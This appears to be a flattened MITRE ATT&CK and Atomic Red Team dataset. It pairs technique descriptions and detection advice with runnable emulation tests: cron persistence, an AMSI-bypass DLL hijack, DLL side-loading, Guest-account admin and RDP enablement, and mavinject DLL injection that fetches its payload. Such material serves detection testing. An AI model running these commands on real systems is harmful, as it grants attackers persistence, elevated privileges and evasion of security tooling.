user. - id: attack-pattern--677569f9-a8b0-459e-ab24-7f18091fa7bf - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-03-26T21:28:19.476Z' - created: '2020-02-18T16:48:56.582Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_defense_bypassed: - - Windows User Account Control - - System access controls - - File system access controls - x_mitre_detection: |- - If an adversary is using a standard command-line shell, analysts can detect token manipulation by auditing command-line activity. Specifically, analysts should look for use of the runas command. Detailed command-line logging is not enabled by default in Windows.(Citation: Microsoft Command-line Logging) - - If an adversary is using a payload that calls the Windows token APIs directly, analysts can detect token manipulation only through careful analysis of user network activity, examination of running processes, and correlation with other endpoint and network behavior. - - Analysts can also monitor for use of Windows APIs such as DuplicateToken(Ex) and CreateProcessWithTokenW and correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators. - x_mitre_data_sources: - - Process command-line parameters - - Process monitoring - - Access tokens - - API monitoring - x_mitre_platforms: - - Windows - atomic_tests: [] - T1543: - technique: - external_references: - - source_name: mitre-attack - external_id: T1543 - url: https://attack.mitre.org/techniques/T1543 - - url: https://technet.microsoft.com/en-us/library/cc772408.aspx - description: Microsoft. (n.d.). Services. Retrieved June 7, 2016. - source_name: TechNet Services - - url: https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html - description: Apple. (n.d.). Creating Launch Daemons and Agents. Retrieved - July 10, 2017. - source_name: AppleDocs Launch Agent Daemons - - url: https://www.synack.com/wp-content/uploads/2016/03/RSA_OSX_Malware.pdf - description: 'Patrick Wardle. (2016, February 29). Let''s Play Doctor: Practical - OS X Malware Detection & Analysis. Retrieved July 10, 2017.' - source_name: OSX Malware Detection - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Create or Modify System Process - description: "Adversaries may create or modify system-level processes to repeatedly - execute malicious payloads as part of persistence. When operating systems - boot up, they can start processes that perform background system functions. - On Windows and Linux, these system processes are referred to as services. - (Citation: TechNet Services) On macOS, launchd processes known as [Launch - Daemon](https://attack.mitre.org/techniques/T1543/004) and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) - are run to finish system initialization and load user specific parameters.(Citation: - AppleDocs Launch Agent Daemons) \n\nAdversaries may install new services, - daemons, or agents that can be configured to execute at startup or a repeatable - interval in order to establish persistence. Similarly, adversaries may modify - existing services, daemons, or agents to achieve the same effect. \n\nServices, - daemons, or agents may be created with administrator privileges but executed - under root/SYSTEM privileges. Adversaries may leverage this functionality - to create or modify system processes in order to escalate privileges. (Citation: - OSX Malware Detection). " - id: attack-pattern--106c0cf6-bf73-4601-9aa8-0945c2715ec5 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-10-09T13:46:29.922Z' - created: '2020-01-10T16:03:18.865Z' - x_mitre_data_sources: - - Windows event logs - - Windows Registry - - File monitoring - - Process command-line parameters - - Process monitoring - x_mitre_version: '1.0' - x_mitre_is_subtechnique: false - x_mitre_detection: "Monitor for changes to system processes that do not correlate - with known software, patch cycles, etc., including by comparing results against - a trusted system baseline. New, benign system processes may be created during - installation of new software. Data and events should not be viewed in isolation, - but as part of a chain of behavior that could lead to other activities, such - as network connections made for Command and Control, learning details about - the environment through Discovery, and Lateral Movement. \n\nCommand-line - invocation of tools capable of modifying services may be unusual, depending - on how systems are typically used in a particular environment. Look for abnormal - process call trees from known services and for execution of other commands - that could relate to Discovery or other adversary techniques. \n\nMonitor - for changes to files associated with system-level processes." - x_mitre_platforms: - - Windows - - macOS - - Linux - atomic_tests: [] - T1053.003: - technique: - external_references: - - source_name: mitre-attack - external_id: T1053.003 - url: https://attack.mitre.org/techniques/T1053/003 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Cron - description: |- - Adversaries may abuse the cron utility to perform task scheduling for initial or recurring execution of malicious code. The cron utility is a time-based job scheduler for Unix-like operating systems. The crontab file contains the schedule of cron entries to be run and the specified times for execution. Any crontab files are stored in operating system-specific file paths. - - An adversary may use cron in Linux or Unix environments to execute programs at system startup or on a scheduled basis for persistence. cron can also be abused to conduct remote Execution as part of Lateral Movement and or to run a process under the context of a specified account. - id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: execution - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-03-23T23:30:46.546Z' - created: '2019-12-03T14:25:00.538Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_remote_support: false - x_mitre_permissions_required: - - User - x_mitre_detection: "Monitor scheduled task creation from common utilities using - command-line invocation. Legitimate scheduled tasks may be created during - installation of new software or through system administration functions. Look - for changes to tasks that do not correlate with known software, patch cycles, - etc. \n\nSuspicious program execution through scheduled tasks may show up - as outlier processes that have not been seen before when compared against - historical data. Data and events should not be viewed in isolation, but as - part of a chain of behavior that could lead to other activities, such as network - connections made for Command and Control, learning details about the environment - through Discovery, and Lateral Movement. " - x_mitre_data_sources: - - Process command-line parameters - - Process monitoring - x_mitre_platforms: - - Linux - - macOS - identifier: T1053.003 - atomic_tests: - - name: Cron - Replace crontab with referenced file - auto_generated_guid: 435057fb-74b1-410e-9403-d81baf194f75 - description: 'This test replaces the current user''s crontab file with the contents - of the referenced file. This technique was used by numerous IoT automated - exploitation attacks. - -' - supported_platforms: - - macos - - linux - input_arguments: - command: - description: Command to execute - type: string - default: "/tmp/evil.sh" - tmp_cron: - description: Temporary reference file to hold evil cron schedule - type: path - default: "/tmp/persistevil" - executor: - name: bash - command: | - crontab -l > /tmp/notevil - echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron} - cleanup_command: 'crontab /tmp/notevil - -' - - name: Cron - Add script to all cron subfolders - auto_generated_guid: b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 - description: 'This test adds a script to /etc/cron.hourly, /etc/cron.daily, - /etc/cron.monthly and /etc/cron.weekly folders configured to execute on a - schedule. This technique was used by the threat actor Rocke during the exploitation - of Linux web servers. - -' - supported_platforms: - - macos - - linux - input_arguments: - command: - description: Command to execute - type: string - default: echo 'Hello from Atomic Red Team' > /tmp/atomic.log - cron_script_name: - description: Name of file to store in cron folder - type: string - default: persistevil - executor: - elevation_required: true - name: bash - command: | - echo "#{command}" > /etc/cron.daily/#{cron_script_name} - echo "#{command}" > /etc/cron.hourly/#{cron_script_name} - echo "#{command}" > /etc/cron.monthly/#{cron_script_name} - echo "#{command}" > /etc/cron.weekly/#{cron_script_name} - cleanup_command: | - rm /etc/cron.daily/#{cron_script_name} - rm /etc/cron.hourly/#{cron_script_name} - rm /etc/cron.monthly/#{cron_script_name} - rm /etc/cron.weekly/#{cron_script_name} - - name: Cron - Add script to /var/spool/cron/crontabs/ folder - auto_generated_guid: 2d943c18-e74a-44bf-936f-25ade6cccab4 - description: 'This test adds a script to a /var/spool/cron/crontabs folder configured - to execute on a schedule. This technique was used by the threat actor Rocke - during the exploitation of Linux web servers. - -' - supported_platforms: - - linux - input_arguments: - command: - description: Command to execute - type: string - default: echo 'Hello from Atomic Red Team' > /tmp/atomic.log - cron_script_name: - description: Name of file to store in /var/spool/cron/crontabs folder - type: string - default: persistevil - executor: - elevation_required: true - name: bash - command: 'echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name} - -' - cleanup_command: 'rm /var/spool/cron/crontabs/#{cron_script_name} - -' - T1574.001: - technique: - created: '2020-03-13T18:11:08.357Z' - modified: '2020-03-26T16:13:58.862Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: defense-evasion - type: attack-pattern - id: attack-pattern--2fee9321-3e71-4cf4-af24-d4d40d355b34 - description: |- - Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution. - - There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program. Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637) - - Adversaries may also directly modify the way a program loads DLLs by replacing an existing DLL or modifying a .manifest or .local redirection file, directory, or junction to cause the program to load a different DLL. (Citation: Microsoft Dynamic-Link Library Redirection) (Citation: Microsoft Manifests) (Citation: FireEye DLL Search Order Hijacking) - - If a search order-vulnerable program is configured to run at a higher privilege level, then the adversary-controlled DLL that is loaded will also be executed at the higher level. In this case, the technique could be used for privilege escalation from user to administrator or SYSTEM or from administrator to SYSTEM, depending on the program. - Programs that fall victim to path hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace. - name: DLL Search Order Hijacking - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1574.001 - url: https://attack.mitre.org/techniques/T1574/001 - - external_id: CAPEC-471 - source_name: capec - url: https://capec.mitre.org/data/definitions/471.html - - source_name: Microsoft Dynamic Link Library Search Order - url: https://docs.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-search-order?redirectedfrom=MSDN - description: Microsoft. (2018, May 31). Dynamic-Link Library Search Order. - Retrieved November 30, 2014. - - url: https://www.owasp.org/index.php/Binary_planting - description: OWASP. (2013, January 30). Binary planting. Retrieved June 7, - 2016. - source_name: OWASP Binary Planting - - source_name: Microsoft Security Advisory 2269637 - url: https://docs.microsoft.com/en-us/security-updates/securityadvisories/2010/2269637 - description: Microsoft. (, May 23). Microsoft Security Advisory 2269637. Retrieved - March 13, 2020. - - source_name: Microsoft Dynamic-Link Library Redirection - url: https://docs.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-redirection?redirectedfrom=MSDN - description: Microsoft. (2018, May 31). Dynamic-Link Library Redirection. - Retrieved March 13, 2020. - - url: https://msdn.microsoft.com/en-US/library/aa375365 - description: Microsoft. (n.d.). Manifests. Retrieved December 5, 2014. - source_name: Microsoft Manifests - - source_name: FireEye DLL Search Order Hijacking - url: https://www.fireeye.com/blog/threat-research/2010/08/dll-search-order-hijacking-revisited.html - description: Nick Harbour. (2010, September 1). DLL Search Order Hijacking - Revisited. Retrieved March 13, 2020. - x_mitre_platforms: - - Windows - x_mitre_contributors: - - Travis Smith, Tripwire - - Stefan Kanthak - x_mitre_data_sources: - - Process command-line parameters - - Process monitoring - - DLL monitoring - - File monitoring - x_mitre_detection: Monitor file systems for moving, renaming, replacing, or - modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared - with past behavior) that do not correlate with known software, patches, etc., - are suspicious. Monitor DLLs loaded into a process and detect DLLs that have - the same file name but abnormal paths. Modifications to or creation of .manifest - and .local redirection files that do not correlate with software updates are - suspicious. - x_mitre_is_subtechnique: true - x_mitre_version: '1.0' - identifier: T1574.001 - atomic_tests: - - name: DLL Search Order Hijacking - amsi.dll - auto_generated_guid: 8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3 - description: | - Adversaries can take advantage of insecure library loading by PowerShell to load a vulnerable version of amsi.dll in order to bypass AMSI (Anti-Malware Scanning Interface) - https://enigma0x3.net/2017/07/19/bypassing-amsi-via-com-server-hijacking/ - - Upon successful execution, powershell.exe will be copied and renamed to updater.exe and load amsi.dll from a non-standard path. - supported_platforms: - - windows - executor: - command: | - copy %windir%\System32\windowspowershell\v1.0\powershell.exe %APPDATA%\updater.exe - copy %windir%\System32\amsi.dll %APPDATA%\amsi.dll - %APPDATA%\updater.exe -Command exit - cleanup_command: | - del %APPDATA%\updater.exe >nul 2>&1 - del %APPDATA%\amsi.dll >nul 2>&1 - name: command_prompt - elevation_required: true - T1574.002: - technique: - external_references: - - source_name: mitre-attack - external_id: T1574.002 - url: https://attack.mitre.org/techniques/T1574/002 - - external_id: CAPEC-641 - source_name: capec - url: https://capec.mitre.org/data/definitions/641.html - - source_name: About Side by Side Assemblies - url: https://docs.microsoft.com/en-us/windows/win32/sbscs/about-side-by-side-assemblies- - description: Microsoft. (2018, May 31). About Side-by-Side Assemblies. Retrieved - March 13, 2020. - - source_name: FireEye DLL Side-Loading - url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf - description: 'Amanda Steward. (2014). FireEye DLL Side-Loading: A Thorn in - the Side of the Anti-Virus Industry. Retrieved March 13, 2020.' - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: DLL Side-Loading - description: |- - Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program. - - Programs may specify DLLs that are loaded at runtime. Programs that improperly or vaguely specify a required DLL may be open to a vulnerability in which an unintended DLL is loaded. Side-loading vulnerabilities specifically occur when Windows Side-by-Side (WinSxS) manifests (Citation: About Side by Side Assemblies) are not explicit enough about characteristics of the DLL to be loaded. Adversaries may take advantage of a legitimate program that is vulnerable by replacing the legitimate DLL with a malicious one. (Citation: FireEye DLL Side-Loading) - - Adversaries likely use this technique as a means of masking actions they perform under a legitimate, trusted system or software process. - id: attack-pattern--e64c62cf-9cd7-4a14-94ec-cdaac43ab44b - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: defense-evasion - modified: '2020-10-17T15:15:27.807Z' - created: '2020-03-13T19:41:37.908Z' - x_mitre_defense_bypassed: - - Anti-virus - - Application control - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_detection: Monitor processes for unusual activity (e.g., a process that - does not use the network begins to do so). Track DLL metadata, such as a hash, - and compare DLLs that are loaded at process execution time against previous - executions to detect differences that do not correlate with patching or updates. - x_mitre_data_sources: - - Loaded DLLs - - Process monitoring - - Process use of network - x_mitre_platforms: - - Windows - identifier: T1574.002 - atomic_tests: - - name: DLL Side-Loading using the Notepad++ GUP.exe binary - auto_generated_guid: 65526037-7079-44a9-bda1-2cb624838040 - description: | - GUP is an open source signed binary used by Notepad++ for software updates, and is vulnerable to DLL Side-Loading, thus enabling the libcurl dll to be loaded. - Upon execution, calc.exe will be opened. - supported_platforms: - - windows - input_arguments: - process_name: - description: Name of the created process - type: string - default: calculator.exe - gup_executable: - description: GUP is an open source signed binary used by Notepad++ for software - updates - type: path - default: PathToAtomicsFolder\T1574.002\bin\GUP.exe - dependency_executor_name: powershell - dependencies: - - description: 'Gup.exe binary must exist on disk at specified location (#{gup_executable}) - -' - prereq_command: 'if (Test-Path #{gup_executable}) {exit 0} else {exit 1} - -' - get_prereq_command: | - New-Item -Type Directory (split-path #{gup_executable}) -ErrorAction ignore | Out-Null - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/bin/GUP.exe?raw=true" -OutFile "#{gup_executable}" - executor: - command: "#{gup_executable}\n" - cleanup_command: 'taskkill /F /IM #{process_name} >nul 2>&1 - -' - name: command_prompt - T1078.001: - technique: - external_references: - - source_name: mitre-attack - external_id: T1078.001 - url: https://attack.mitre.org/techniques/T1078/001 - - external_id: CAPEC-70 - source_name: capec - url: https://capec.mitre.org/data/definitions/70.html - - source_name: Microsoft Local Accounts Feb 2019 - url: https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/local-accounts - description: Microsoft. (2018, December 9). Local Accounts. Retrieved February - 11, 2019. - - source_name: Metasploit SSH Module - url: https://github.com/rapid7/metasploit-framework/tree/master/modules/exploits/linux/ssh - description: undefined. (n.d.). Retrieved April 12, 2019. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Default Accounts - description: |- - Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems or default factory/provider set accounts on other types of systems, software, or devices.(Citation: Microsoft Local Accounts Feb 2019) - - Default accounts are not limited to client machines, rather also include accounts that are preset for equipment such as network devices and computer applications whether they are internal, open source, or commercial. Appliances that come preset with a username and password combination pose a serious threat to organizations that do not change it post installation, as they are easy targets for an adversary. Similarly, adversaries may also utilize publicly disclosed or stolen [Private Keys](https://attack.mitre.org/techniques/T1552/004) or credential materials to legitimately connect to remote environments via [Remote Services](https://attack.mitre.org/techniques/T1021).(Citation: Metasploit SSH Module) - id: attack-pattern--6151cbea-819b-455a-9fa6-99a1cc58797d - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: initial-access - modified: '2020-09-16T19:41:43.491Z' - created: '2020-03-13T20:15:31.974Z' - x_mitre_version: '1.1' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - Administrator - - User - x_mitre_detection: Monitor whether default accounts have been activated or logged - into. These audits should also include checks on any appliances and applications - for default credentials or SSH keys, and if any are discovered, they should - be updated immediately. - x_mitre_data_sources: - - AWS CloudTrail logs - - Stackdriver logs - - Authentication logs - - Process monitoring - x_mitre_platforms: - - Linux - - macOS - - Windows - - AWS - - GCP - - Azure - - Office 365 - - Azure AD - - SaaS - identifier: T1078.001 - atomic_tests: - - name: Enable Guest account with RDP capability and admin priviliges - auto_generated_guid: 99747561-ed8d-47f2-9c91-1e5fde1ed6e0 - description: After execution the Default Guest account will be enabled (Active) - and added to Administrators and Remote Desktop Users Group, and desktop will - allow multiple RDP connections - supported_platforms: - - windows - input_arguments: - guest_user: - description: Specify the guest account - type: String - default: guest - guest_password: - description: Specify the guest password - type: String - default: Password123! - executor: - command: |- - net user #{guest_user} /active:yes - net user #{guest_user} #{guest_password} - net localgroup administrators #{guest_user} /add - net localgroup "Remote Desktop Users" #{guest_user} /add - reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f - reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f - cleanup_command: |- - net user #{guest_user} /active:no >nul 2>&1 - net localgroup administrators #{guest_user} /delete >nul 2>&1 - net localgroup "Remote Desktop Users" #{guest_user} /delete >nul 2>&1 - reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f >nul 2>&1 - reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f >nul 2>&1 - name: command_prompt - elevation_required: true - T1078.002: - technique: - external_references: - - source_name: mitre-attack - external_id: T1078.002 - url: https://attack.mitre.org/techniques/T1078/002 - - external_id: CAPEC-560 - source_name: capec - url: https://capec.mitre.org/data/definitions/560.html - - url: https://technet.microsoft.com/en-us/library/dn535501.aspx - description: Microsoft. (2016, April 15). Attractive Accounts for Credential - Theft. Retrieved June 3, 2016. - source_name: TechNet Credential Theft - - source_name: Microsoft AD Accounts - url: https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/active-directory-accounts - description: Microsoft. (2019, August 23). Active Directory Accounts. Retrieved - March 13, 2020. - - url: https://technet.microsoft.com/en-us/library/dn487457.aspx - description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved - June 3, 2016. - source_name: TechNet Audit Policy - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Domain Accounts - description: |- - Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. (Citation: TechNet Credential Theft) Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services.(Citation: Microsoft AD Accounts) - - Adversaries may compromise domain accounts, some with a high level of privileges, through various means such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or password reuse, allowing access to privileged resources of the domain. - id: attack-pattern--c3d4bdd9-2cfe-4a80-9d0c-07a29ecdce8f - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: initial-access - modified: '2020-09-16T19:42:11.787Z' - created: '2020-03-13T20:21:54.758Z' - x_mitre_version: '1.1' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - User - - Administrator - x_mitre_detection: |- - Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access). - - Perform regular audits of domain accounts to detect accounts that may have been created by an adversary for persistence. - x_mitre_data_sources: - - Authentication logs - - Process monitoring - x_mitre_platforms: - - Linux - - macOS - - Windows - atomic_tests: [] - T1574.004: - technique: - id: attack-pattern--fc742192-19e3-466c-9eb5-964a97b29490 - description: |- - Adversaries may execute their own malicious payloads by hijacking ambiguous paths used to load libraries. Adversaries may plant trojan dynamic libraries, in a directory that will be searched by the operating system before the legitimate library specified by the victim program, so that their malicious library will be loaded into the victim program instead. MacOS and OS X use a common method to look for required dynamic libraries (dylib) to load into a program based on search paths. - - A common method is to see what dylibs an application uses, then plant a malicious version with the same name higher up in the search path. This typically results in the dylib being in the same folder as the application itself. (Citation: Writing Bad Malware for OSX) (Citation: Malware Persistence on OS X) - - If the program is configured to run at a higher privilege level than the current user, then when the dylib is loaded into the application, the dylib will also run at that elevated level. - name: Dylib Hijacking - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1574.004 - url: https://attack.mitre.org/techniques/T1574/004 - - external_id: CAPEC-471 - source_name: capec - url: https://capec.mitre.org/data/definitions/471.html - - url: https://www.blackhat.com/docs/us-15/materials/us-15-Wardle-Writing-Bad-A-Malware-For-OS-X.pdf - description: Patrick Wardle. (2015). Writing Bad @$$ Malware for OS X. Retrieved - July 10, 2017. - source_name: Writing Bad Malware for OSX - - url: https://www.rsaconference.com/writable/presentations/file_upload/ht-r03-malware-persistence-on-os-x-yosemite_final.pdf - description: Patrick Wardle. (2015). Malware Persistence on OS X Yosemite. - Retrieved July 10, 2017. - source_name: Malware Persistence on OS X - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: defense-evasion - modified: '2020-09-16T16:48:09.391Z' - created: '2020-03-16T15:23:30.896Z' - x_mitre_platforms: - - macOS - x_mitre_data_sources: - - Process monitoring - - File monitoring - x_mitre_detection: 'Objective-See''s Dylib Hijacking Scanner can be used to - detect potential cases of dylib hijacking. Monitor file systems for moving, - renaming, replacing, or modifying dylibs. Changes in the set of dylibs that - are loaded by a process (compared to past behavior) that do not correlate - with known software, patches, etc., are suspicious. Check the system for multiple - dylibs with the same name and monitor which versions have historically been - loaded into a process. ' - x_mitre_is_subtechnique: true - x_mitre_version: '1.0' - x_mitre_defense_bypassed: - - Application control - atomic_tests: [] - T1055.001: - technique: - created: '2020-01-14T01:26:08.145Z' - modified: '2020-06-20T22:17:59.148Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - type: attack-pattern - external_references: - - source_name: mitre-attack - external_id: T1055.001 - url: https://attack.mitre.org/techniques/T1055/001 - - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process - description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques: - A Technical Survey Of Common And Trending Process Injection Techniques. - Retrieved December 7, 2017.' - source_name: Endgame Process Injection July 2017 - - url: https://www.endgame.com/blog/technical-blog/hunting-memory - description: Desimone, J. (2017, June 13). Hunting in Memory. Retrieved December - 7, 2017. - source_name: Endgame HuntingNMemory June 2017 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Dynamic-link Library Injection - description: "Adversaries may inject dynamic-link libraries (DLLs) into processes - in order to evade process-based defenses as well as possibly elevate privileges. - DLL injection is a method of executing arbitrary code in the address space - of a separate live process. \n\nDLL injection is commonly performed by writing - the path to a DLL in the virtual address space of the target process before - loading the DLL by invoking a new thread. The write can be performed with - native Windows API calls such as VirtualAllocEx and WriteProcessMemory, - then invoked with CreateRemoteThread (which calls the LoadLibrary - API responsible for loading the DLL). (Citation: Endgame Process Injection - July 2017) \n\nVariations of this method such as reflective DLL injection - (writing a self-mapping DLL into a process) and memory module (map DLL when - writing into process) overcome the address relocation issue as well as the - additional APIs to invoke execution (since these methods load and execute - the files in memory by manually preforming the function of LoadLibrary).(Citation: - Endgame HuntingNMemory June 2017)(Citation: Endgame Process Injection July - 2017) \n\nRunning code in the context of another process may allow access - to the process's memory, system/network resources, and possibly elevated privileges. - Execution via DLL injection may also evade detection from security products - since the execution is masked under a legitimate process. " - id: attack-pattern--f4599aa0-4f85-4a32-80ea-fc39dc965945 - x_mitre_defense_bypassed: - - Application control - - Anti-virus - x_mitre_data_sources: - - Process monitoring - - DLL monitoring - - File monitoring - - API monitoring - x_mitre_permissions_required: - - User - x_mitre_detection: "Monitoring Windows API calls indicative of the various types - of code injection may generate a significant amount of data and may not be - directly useful for defense unless collected under specific circumstances - for known bad sequences of calls, since benign use of API functions may be - common and difficult to distinguish from malicious behavior. Windows API calls - such as CreateRemoteThread and those that can be used to modify - memory within another process, such as VirtualAllocEx/WriteProcessMemory, - may be used for this technique.(Citation: Endgame Process Injection July 2017)\n\nMonitor - DLL/PE file events, specifically creation of these binary files as well as - the loading of DLLs into processes. Look for DLLs that are not recognized - or not normally loaded into a process. \n\nAnalyze process behavior to determine - if a process is performing actions it usually does not, such as opening network - connections, reading files, or other suspicious actions that could relate - to post-compromise behavior. " - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_platforms: - - Windows - identifier: T1055.001 - atomic_tests: - - name: Process Injection via mavinject.exe - auto_generated_guid: 74496461-11a1-4982-b439-4d87a550d254 - description: | - Windows 10 Utility To Inject DLLS. - - Upon successful execution, powershell.exe will download T1055.dll to disk. Powershell will then spawn mavinject.exe to perform process injection in T1055.dll. - With default arguments, expect to see a MessageBox, with notepad's icon in taskbar. - supported_platforms: - - windows - input_arguments: - process_id: - description: PID of input_arguments - type: Integer - default: "(Start-Process notepad -PassThru).id" - dll_payload: - description: DLL to Inject - type: Path - default: PathToAtomicsFolder\T1055.001\src\x64\T1055.001.dll - dependency_executor_name: powershell - dependencies: - - description: 'Utility to inject must exist on disk at specified location (#{dll_payload}) - -' - prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1} - -' - get_prereq_command: | - New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055.001/src/x64/T1055.001.dll" -OutFile "#{dll_payload}" - executor: - command: | - $mypid = #{process_id} - mavinject $mypid /INJECTRUNNING #{dll_payload} - name: powershell - elevation_required: true - T1548.004: - technique: - external_references: - - source_name: mitre-attack - external_id: T1548.004 - url: https://attack.mitre.org/techniques/T1548/004 - - source_name: AppleDocs AuthorizationExecuteWithPrivileges - url: https://developer.apple.com/documentation/security/1540038-authorizationexecutewithprivileg - description: Apple. (n.d.). Apple Developer Documentation - AuthorizationExecuteWithPrivileges. - Retrieved August 8, 2019. - - source_name: Death by 1000 installers; it's all broken! - url: https://speakerdeck.com/patrickwardle/defcon-2017-death-by-1000-installers-its-all-broken?slide=8 - description: Patrick Wardle. (2017). Death by 1000 installers; it's all broken!. - Retrieved August 8, 2019. - - source_name: Carbon Black Shlayer Feb 2019 - url: https://www.carbonblack.com/2019/02/12/tau-threat-intelligence-notification-new-macos-malware-variant-of-shlayer-osx-discovered/ - description: Carbon Black Threat Analysis Unit. (2019, February 12). New macOS - Malware Variant of Shlayer (OSX) Discovered. Retrieved August 8, 2019. 